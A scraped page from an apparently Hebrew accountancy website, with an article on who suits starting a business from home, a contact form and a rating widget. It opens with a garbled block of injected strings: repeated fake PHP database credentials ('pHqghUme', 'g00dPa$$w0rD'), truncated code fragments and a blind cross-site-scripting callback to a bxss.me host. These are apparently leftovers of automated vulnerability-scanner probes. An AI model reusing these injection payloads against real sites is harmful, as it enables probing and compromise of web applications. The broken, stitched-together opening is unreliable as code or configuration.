$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1iHl8CheO"; ?> $db_host = "1"; $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1<tMjBvl<"; ?>acker-9573/log.php?"; ?>{acx}}%>"; ?>"; ?>ass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>'hitylezkgfiwoe392a.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>  רואה חשבון ועוד - למי כדאי להקים עסק מהבית?


רואה חשבון ועוד!

הבית הפיננסי שלך

 רואה חשבון ועוד
חוות דעת מקצועית בענייני ראיית חשבון:
שם מלא
מספר טלפון
פנייה לרואה חשבון >>

למי כדאי להקים עסק מהבית? האם זה מתאים לך?


דרגו אותנו:
| דירוגך () בוצע בהצלחה
 () דירוגים | דירוג ממוצע ()
stars - based on reviews

Hebrew

הקמת עסק מהבית הינה אפשרות בעלת יתרונות אדירים ומבחינות מסוימות היא מעניקה חיים נוחים, אשר אי אפשר להשיג בשום דרך אחרת. מאידך, לא ניתן להתעלם מהסיכונים הנלווים להקמת עסק בכלל ולהקמת עסק מהבית בפרט.

משום כך, לפני ששוקלים את הרעיון של לעבוד מן הבית, חשוב להבין מהם המאפיינים של עבודה מהבית, איזה עסק כדאי להקים מהבית, כיצד צריך להתנהג עסק שפועל בבית ואילו קריטריונים כדאי שיהיו לאדם המחליט על מהלך כזה?

הקמת עסק מהבית, עשויה לאפשר מפלט מסוים מעולם הקריירה השכירה, אשר הינו עולם עמוס ומלחיץ. עבודה מן הבית עשויה לאפשר שילוב נדיר בין עבודה קשה בשעות לא שגרתיות תוך התמסרות מקסימלית לצרכי העסק, לבין חיסכון בזמן הנסיעות לעבודה, שליטה מוחלטת על הקורה בעסק וביטול הצורך למסור דין וחשבון למעביד, אשר נמצא מעליך בהיררכיה הארגונית.

האפשרות היקרה מפז שהקמת עסק מהבית עשויה להעניק, הינה מעורבות בבית ובמשפחה ובכלל זה שיתוף אקטיבי בגידול ילדים. העובדה כי העסק פועל מן הבית, עשויה לאפשר גמישות רבה בשעות העבודה והתאמת השעות לשעות הפעילות בבית, או לשעות מנוחת צהריים.

במקרים רבים, הקמת עסק מהבית, "מרפדת" את העיסוק הקפיטליסטי והקרייריסטי, בנוחות של הבית ובאפשרויות שהוא מספק. יחד עם זאת, צריך גם לזכור כי עבודה וניהול עסק מהבית פירושם, באחוז רב של המקרים, להיות עצמאי.

המאפיינים המאתגרים של עבודה מהבית

הקמת עסק, כל עסק, דורשת ניהול מעורב וכריזמטי המשווק היטב את מוצרו ומסוגל לתמוך בעסק בשנים הראשונות שלו, שהן שנים איטיות וקשות לכל עסק.

ניהול עסק בראשית דרכו, הוא עניין מורכב יותר ממה שמרבית האנשים המנסים לעשות צעד זה מתארים לעצמם, והסטטיסטיקה מראה כי רבים מהעסקים הקטנים נסגרים במהלך השנתיים הראשונות לפעילותם.

לקריאה נוספת: מדריך לפתיחת עסק

בהקמת עסק מהבית, יש צורך במשמעת עצמית וביכולת לארגן סדר יום שכולל עבודה.

בנוסף, יש צורך לארגן בבית סביבת עבודה נוחה, אשר תהיה מובדלת משאר חלקי הבית ותכלול את כל האמצעים והאביזרים הדרושים לשגרת עבודה.

בדיקה כזו הכוללת בחינה רצינית של כדאיות העניין, יכולה למנוע עוגמת נפש ומפלה כספית, בשלבים מאוחרים יותר.

הקמת עסק מהבית – באילו מקרים זה מתאים?

הקמת עסק מהבית מתאימה לסוג מסוים של עיסוקים, כמו גם לסוג מסויים של יזמים.
מבחינת סוג העיסוק, כדאי לבחון היטב כי תחום העסק המוקם מהבית, אינו דורש נוכחות במקומות שונים כחלק מן העבודה, או שמיקום הבית אינו מפריע לניהול התקין של העבודה.

לדוגמה, אם העסק המוקם בבית, הינו חנות לממכר מוצרים כלשהם והבית נמצא בעיירת ספר קטנה ורחוקה מן המרכז – ייתכן שבמקרה כזה, הקמת עסק מהבית אינה הרעיון המיטבי ומומלץ יותר לשכור חנות במרכז, או אפילו למצוא בית במיקום אחר שניתן יהיה לעבוד ממנו.

כדי לבדוק האם כדאי לכם להקים עסק מן הבית, רצוי כי תשאלו את עצמכם את השאלות הבאות:

  • האם העבודה במסגרת נוקשה והיררכית מגבילה אתכם?
  • האם מצבכם המשפחתי מכריח אתכם להקדיש זמן רב לגידול הילדים ולהתעסקות בענייני הבית?
  • האם שאר בני הבית, יתמכו ברעיון?
  • האם חלות עליכם מגבלות פיזות, אשר מקשות עליכם להתנייד אל מקום העבודה?
  • האם אתם טיפוס יצירתי בעל חוש לעסקים?
  • האם חלמתם תמיד על קריירה עצמאית משלכם?
  • האם יש לך את הידע המקצועי הדרוש לפתיחת עסק מן הבית?

במידה והתשובות לשאלות הנ"ל הן חיוביות, ישנה סבירות גדולה כי לפחות בנתוני הפתיחה שלכם אתם יכולים לנסות ולחשוב על פתיחת עסק ביתי.

עבודה מן הבית יכולה להתאים גם לאנשים אשר פרשו מעבודתם ויצאו לפנסיה, ועתה הם מרגישים שנשאר בהם עוד כוח ורצון לעבוד.

קיראו: איך בוחרים רואה חשבון לעסק?

רוב העסקים לא יקבלו לשירותיהם גמלאים ופורשים ועל כן עבודה מן הבית יכולה להוות פתרון מוצלח להמשך עבודה גם לאחר גיל הפנסיה.

ולסיכום, מן היזם המקים עסק מהבית, תידרשנה תכונות כמו סבלנות, מוטיבציה, יכולת כלכלית לספוג הפסדים, אפשרות לייצר שגרה ולעבוד בתנאים פחות נוחים מאלה שמספק משרד, אמונה ביכולתו לשווק את העסק החדש והבנה בתחום הכללי של הקמת עסק.

לקריאה נוספת: תכנון עסקי


תאריך: 29/09/2014 16:53
 
close